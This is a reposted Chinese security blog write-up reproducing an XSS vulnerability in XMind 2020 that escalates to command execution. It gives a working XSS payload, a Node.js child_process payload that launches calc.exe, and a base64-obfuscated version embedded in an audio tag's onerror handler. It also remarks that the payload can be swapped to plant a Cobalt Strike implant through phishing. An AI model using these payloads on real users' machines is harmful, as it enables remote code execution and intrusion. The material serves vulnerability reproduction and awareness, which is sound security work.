Xmind 2020 XSS漏洞导致命令执行复现
2021-05-18 10:41:18 Author: xz.aliyun.com(查看原文) 阅读量:111 收藏

今天看到某数字云漏洞预警,但没给利用代码就.....于是跑去复现一下
XMind 是一个全功能的思维导图和头脑风暴软件,为激发灵感和创意而生。作为一款有效提升工作和生活效率的生产力工具,受到全球百千万用户的青睐。
下载地址:https://www.xmind.cn/
下载xmind2020最新版本

一、Xss:
1、利用过程:
主题插入xss利用代码

在大纲页面触发

实现弹窗

2、利用代码:

<audio src=x onerror=confirm("casrc")>

二、命令执行:
1、利用过程:
主题插入命令执行利用代码

在大纲页面触发实现命令执行

触发弹出计算器

2、利用代码:

通过nodejs调用执行系统命令打开计算器
require('child_process').exec('calc.exe',(error, stdout, stderr)=>{alert(stdout: ${stdout});});

<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

三、评价
实现过程简单,用户范围庞大(看了下实验室小伙伴电脑基本都有),危害严重(替换利用代码可实现cs上线等功能)。谨防钓鱼攻击。复现完毕~


文章来源: http://xz.aliyun.com/t/9559
如有侵权请联系:admin#unsafe.sh